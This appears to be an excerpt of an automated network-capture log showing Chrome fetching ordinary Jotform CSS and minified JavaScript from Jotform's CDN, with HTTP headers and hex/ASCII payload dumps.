                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC796INData Raw: 32 30 62 33 0d 0a 2e 64 6f 6e 61 74 69 6f 6e 42 6f 78 56 32 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 64 6f 6e 61 74 69 6f 6e 42 6f 78 56 32 20 2e 53 63 50 72 6f 67 72 65 73 73 42 61 72 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 37 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 34 39 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 53 63 50 72 6f 67 72 65 73 73 42 61 72 42 6f 72 64 65 72 43 6f 6c 6f 72 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63
                                                                                                                                                                                                                                            Data Ascii: 20b3.donationBoxV2{width:100%}.donationBoxV2 .ScProgressBar{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;font-size:14px;width:100%;height:17px;border-radius:149px;border:1px solid var(--ScProgressBarBorderColor);background-c
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 33 72 65 6d 7d 2e 64 6f 6e 61 74 69 6f 6e 42 6f 78 56 32 20 2e 53 63 43 75 73 74 6f 6d 49 6e 70 75 74 43 6f 6e 74 61 69 6e 65 72 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 53 63 43 75 73 74 6f 6d 49 6e 70 75 74 43 6f 6e 74 61 69 6e 65 72 42 6f 72 64 65 72 43 6f 6c 6f 72 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c
                                                                                                                                                                                                                                            Data Ascii: {font-weight:500;margin-left:.3rem}.donationBoxV2 .ScCustomInputContainer{border:1px solid transparent;border-color:var(--ScCustomInputContainerBorderColor);border-radius:4px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-fl
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 29 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 30 20 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 64 6f 6e 61 74 69 6f 6e 42 6f 78 56 32 20 2e 53 63 43 75 73 74 6f 6d 49 6e 70 75 74 43 6f 6e 74 61 69 6e 65 72 20 2e
                                                                                                                                                                                                                                            Data Ascii: );border:none;outline:none;margin:0;padding:0 0 0 .25rem;font-size:20px;font-weight:500;line-height:32px;text-align:center;background-color:transparent;max-width:calc(100% - 20px);white-space:nowrap;overflow:hidden}.donationBoxV2 .ScCustomInputContainer .
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 3a 75 6e 73 65 74 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 53 63 53 63 54 69 74 6c 65 46 6f 6e 74 43 6f 6c 6f 72 29 7d 2e 64 6f 6e 61 74 69 6f 6e 42 6f 78 56 32 20 2e 53 63 44 6f 6e 61 74 69 6f 6e 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 20 2e 53 63 54 69 74 6c 65 43 6f 6e 74 61 69 6e 65 72 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 63 75 72 73 6f 72 3a 74 65 78 74 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 53 63 53 63 53 75 62 54 69 74
                                                                                                                                                                                                                                            Data Ascii: :unset;word-break:break-word;min-width:30px;display:block;max-width:100%;margin:0;padding:0;color:var(--ScScTitleFontColor)}.donationBoxV2 .ScDonationItemContainer .ScTitleContainer .description{display:block;height:auto;cursor:text;color:var(--ScScSubTit
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 53 63 41 64 64 4e 65 77 50 72 69 63 65 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 34 30 70 78 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 37 32 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 39 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 64 66 38 66 66 3b 63 6f 6c 6f 72 3a 23 30 39 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30
                                                                                                                                                                                                                                            Data Ascii: ScAddNewPrice{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;height:40px;width:100%;max-width:672px;min-width:292px;border-radius:4px;background-color:#edf8ff;color:#09f;font-weight:50
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 72 69 63 65 42 61 64 67 65 42 6f 72 64 65 72 43 6f 6c 6f 72 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 53 63 50 72 69 63 65 42 61 64 67 65 46 6f 6e 74 43 6f 6c 6f 72 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 6d 73 2d 66 6c 65 78 3a 31 20 31 20 31 30 30 25 3b 66 6c 65 78 3a 31 20 31 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 20 65 61 73 65 7d 2e 64 6f 6e 61 74 69 6f 6e 42 6f 78 56 32 20 2e 53 63 44 6f 6e 61 74 69 6f 6e 49 74 65
                                                                                                                                                                                                                                            Data Ascii: riceBadgeBorderColor);font-size:20px;line-height:40px;font-weight:500;font-family:inherit;color:var(--ScPriceBadgeFontColor);background-color:transparent;-ms-flex:1 1 100%;flex:1 1 100%;max-width:200px;transition:all .3s ease}.donationBoxV2 .ScDonationIte
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC738INData Raw: 72 7b 63 75 72 73 6f 72 3a 74 65 78 74 7d 2e 64 6f 6e 61 74 69 6f 6e 42 6f 78 56 32 20 2e 53 63 44 6f 6e 61 74 69 6f 6e 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 20 2e 53 63 44 6f 6e 61 74 65 42 74 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 53 63 44 6f 6e 61 74 65 42 74 6e 48 6f 76 65 72 42 67 43 6f 6c 6f 72 29 7d 2e 64 6f 6e 61 74 69 6f 6e 42 6f 78 56 32 20 2e 53 63 44 6f 6e 61 74 69 6f 6e 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 20 2e 53 63 44 6f 6e 61 74 65 42 74 6e 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 53 63 44 6f 6e 61 74 65 42 74 6e 48 6f 76 65 72 41 63 74 69 76 65 42 67 43 6f 6c 6f 72 29 7d 2e 64 6f 6e 61 74 69 6f 6e 42 6f 78 56 32 20 2e 53 63 44 6f
                                                                                                                                                                                                                                            Data Ascii: r{cursor:text}.donationBoxV2 .ScDonationItemContainer .ScDonateBtn:hover{background-color:var(--ScDonateBtnHoverBgColor)}.donationBoxV2 .ScDonationItemContainer .ScDonateBtn:active{background-color:var(--ScDonateBtnHoverActiveBgColor)}.donationBoxV2 .ScDo
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            10192.168.2.1749717104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC567OUTGET /s/portal/674ac14411e/static/js/jotform.css.a4a80bcb.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 523
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:16 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "b1d1c4c5bf1bb759c4ca1d51f6f46074"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 259
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b659f2de9a-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC523INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 74 68 69 73 3a 73 65 6c 66 29 2e 63 68 75 6e 6b 4c 69 73 74 3d 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 74 68 69 73 3a 73 65 6c 66 29 2e 63 68 75 6e 6b 4c 69 73 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 32 32 32 22 5d 2c 7b 39 32 39 37 36 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 34 33 39 31 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 34 38 32 30 30 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 37 39 35 36 30 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 7d 5d 29 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64
                                                                                                                                                                                                                                            Data Ascii: "use strict";(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["7222"],{92976:function(){},43911:function(){},48200:function(){},79560:function(){}}]);!function(){try{var e="undefined"!=typeof wind


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            11192.168.2.1749714104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC549OUTGET /s/umd/674ac14411e/for-csa-timeout.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn01.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 60031
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:00 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:48 GMT
                                                                                                                                                                                                                                            etag: "700e9fca74fa92077675421461929668"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 292
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b65cbd0f90-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC941INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 66 6f 72 2d 63 73 61 2d 74 69 6d 65 6f 75 74 22 5d 3d 74 28 29 3a 65 5b 22 66 6f 72 2d 63 73 61 2d 74 69 6d 65 6f 75 74 22 5d 3d 74 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20
                                                                                                                                                                                                                                            Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports["for-csa-timeout"]=t():e["for-csa-timeout"]=t()}(this,function(){return function(){var
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 72 28 39 31 31 38 36 29 2c 69 3d 72 28 35 39 37 31 33 29 2c 73 3d 72 28 32 31 34 33 31 29 2c 61 3d 72 28 33 36 38 30 31 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 76 61 72 20 74 3d 2d 31 2c 72 3d 6e 75 6c 6c 3d 3d 65 3f 30 3a 65 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 74 68 69 73 2e 63 6c 65 61 72 28 29 3b 2b 2b 74 3c 72 3b 29 7b 76 61 72 20 6e 3d 65 5b 74 5d 3b 74 68 69 73 2e 73 65 74 28 6e 5b 30 5d 2c 6e 5b 31 5d 29 7d 7d 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 6e 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 6f 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 69 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 73 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 61 2c 65 2e 65 78 70 6f 72 74 73 3d 6c 7d 2c 33 32 35 39
                                                                                                                                                                                                                                            Data Ascii: r(91186),i=r(59713),s=r(21431),a=r(36801);function l(e){var t=-1,r=null==e?0:e.length;for(this.clear();++t<r;){var n=e[t];this.set(n[0],n[1])}}l.prototype.clear=n,l.prototype.delete=o,l.prototype.get=i,l.prototype.has=s,l.prototype.set=a,e.exports=l},3259
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 2e 70 72 6f 74 6f 74 79 70 65 3a 76 6f 69 64 20 30 2c 75 3d 6c 3f 6c 2e 74 6f 53 74 72 69 6e 67 3a 76 6f 69 64 20 30 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 20 74 3b 69 66 28 69 28 74 29 29 72 65 74 75 72 6e 20 6f 28 74 2c 65 29 2b 22 22 3b 69 66 28 73 28 74 29 29 72 65 74 75 72 6e 20 75 3f 75 2e 63 61 6c 6c 28 74 29 3a 22 22 3b 76 61 72 20 72 3d 74 2b 22 22 3b 72 65 74 75 72 6e 22 30 22 3d 3d 72 26 26 31 2f 74 3d 3d 2d 61 3f 22 2d 30 22 3a 72 7d 7d 2c 37 39 30 32 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 31 30 31 36 33 29 2c 6f 3d 72 28 31 30 37 32 36 29 2c 69 3d 72 28 31 37 38 30 31 29 2c 73 3d 72 28
                                                                                                                                                                                                                                            Data Ascii: .prototype:void 0,u=l?l.toString:void 0;e.exports=function e(t){if("string"==typeof t)return t;if(i(t))return o(t,e)+"";if(s(t))return u?u.call(t):"";var r=t+"";return"0"==r&&1/t==-a?"-0":r}},79026:function(e,t,r){var n=r(10163),o=r(10726),i=r(17801),s=r(
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 66 28 6e 29 7b 76 61 72 20 72 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 22 5f 5f 6c 6f 64 61 73 68 5f 68 61 73 68 5f 75 6e 64 65 66 69 6e 65 64 5f 5f 22 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 7d 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 74 2c 65 29 3f 74 5b 65 5d 3a 76 6f 69 64 20 30 7d 7d 2c 39 34 31 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 39 33 33 37 29 2c 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 3b 72 65 74 75 72 6e 20 6e 3f 76 6f 69 64 20 30 21 3d 3d 74 5b 65 5d 3a 6f 2e 63 61 6c 6c 28 74 2c 65 29 7d 7d 2c 34 32 37 32 31 3a 66 75 6e 63
                                                                                                                                                                                                                                            Data Ascii: f(n){var r=t[e];return"__lodash_hash_undefined__"===r?void 0:r}return o.call(t,e)?t[e]:void 0}},94191:function(e,t,r){var n=r(9337),o=Object.prototype.hasOwnProperty;e.exports=function(e){var t=this.__data__;return n?void 0!==t[e]:o.call(t,e)}},42721:func
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 35 33 31 36 32 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 2c 65 29 3e 2d 31 7d 7d 2c 32 38 35 34 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 35 33 31 36 32 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 5f 64 61 74 61 5f 5f 2c 6f 3d 6e 28 72 2c 65 29 3b 72 65 74 75 72 6e 20 6f 3c 30 3f 28 2b 2b 74 68 69 73 2e 73 69 7a 65 2c 72 2e 70 75 73 68 28 5b 65 2c 74 5d 29 29 3a 72 5b 6f 5d 5b 31 5d 3d 74 2c 74 68 69 73 7d 7d 2c 37 33 36 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 32
                                                                                                                                                                                                                                            Data Ascii: on(e,t,r){var n=r(53162);e.exports=function(e){return n(this.__data__,e)>-1}},28541:function(e,t,r){var n=r(53162);e.exports=function(e,t){var r=this.__data__,o=n(r,e);return o<0?(++this.size,r.push([e,t])):r[o][1]=t,this}},73649:function(e,t,r){var n=r(2
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 3f 2f 67 2c 73 3d 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 5b 5d 3b 72 65 74 75 72 6e 20 34 36 3d 3d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 26 26 74 2e 70 75 73 68 28 22 22 29 2c 65 2e 72 65 70 6c 61 63 65 28 6f 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 2c 6f 29 7b 74 2e 70 75 73 68 28 6e 3f 6f 2e 72 65 70 6c 61 63 65 28 69 2c 22 24 31 22 29 3a 72 7c 7c 65 29 7d 29 2c 74 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 73 7d 2c 33 33 31 31 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 32 31 39 39 35 29 2c 6f 3d 31 2f 30 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 6e 28 65 29 29 72 65 74 75 72 6e 20 65 3b 76 61
                                                                                                                                                                                                                                            Data Ascii: ?/g,s=n(function(e){var t=[];return 46===e.charCodeAt(0)&&t.push(""),e.replace(o,function(e,r,n,o){t.push(n?o.replace(i,"$1"):r||e)}),t});e.exports=s},33110:function(e,t,r){var n=r(21995),o=1/0;e.exports=function(e){if("string"==typeof e||n(e))return e;va
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2c 6f 3d 74 3f 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 6e 29 3a 6e 5b 30 5d 2c 69 3d 72 2e 63 61 63 68 65 3b 69 66 28 69 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 69 2e 67 65 74 28 6f 29 3b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 6e 29 3b 72 65 74 75 72 6e 20 72 2e 63 61 63 68 65 3d 69 2e 73 65 74 28 6f 2c 73 29 7c 7c 69 2c 73 7d 3b 72 65 74 75 72 6e 20 72 2e 63 61 63 68 65 3d 6e 65 77 28 6f 2e 43 61 63 68 65 7c 7c 6e 29 2c 72 7d 6f 2e 43 61 63 68 65 3d 6e 2c 65 2e 65 78 70 6f 72 74 73 3d 6f 7d 2c 31 37 30 31 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 31 36 33 31 36 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                            Data Ascii: var n=arguments,o=t?t.apply(this,n):n[0],i=r.cache;if(i.has(o))return i.get(o);var s=e.apply(this,n);return r.cache=i.set(o,s)||i,s};return r.cache=new(o.Cache||n),r}o.Cache=n,e.exports=o},17010:function(e,t,r){var n=r(16316);e.exports=function(e){return
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 65 6f 75 74 28 28 29 3d 3e 72 28 65 28 29 29 2c 74 29 29 2c 63 3d 61 73 79 6e 63 28 65 2c 74 3d 33 2c 72 3d 31 30 29 3d 3e 7b 6c 65 74 20 6e 3d 61 73 79 6e 63 20 6f 3d 3e 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 77 61 69 74 20 65 28 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 6f 3c 3d 74 29 7b 6c 65 74 20 65 3d 6f 2b 31 3b 72 65 74 75 72 6e 20 75 28 28 29 3d 3e 6e 28 65 29 2c 72 29 7d 72 65 74 75 72 6e 7d 7d 3b 72 65 74 75 72 6e 20 6e 28 31 29 7d 2c 66 3d 65 3d 3e 7b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 66 6f 72 45 61 63 68 28 74 3d 3e 7b 6c 5b 74 5d 26 26 6c 5b 74 5d 2e 63 6f 6e 74 61 69 6e 73 2e 69 6e 63 6c 75 64 65 73 28 65 5b 74 5d 29 26 26 28 65 5b 74 5d 3d 6c 5b 74 5d 2e 74 6f 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 5b 74 5d
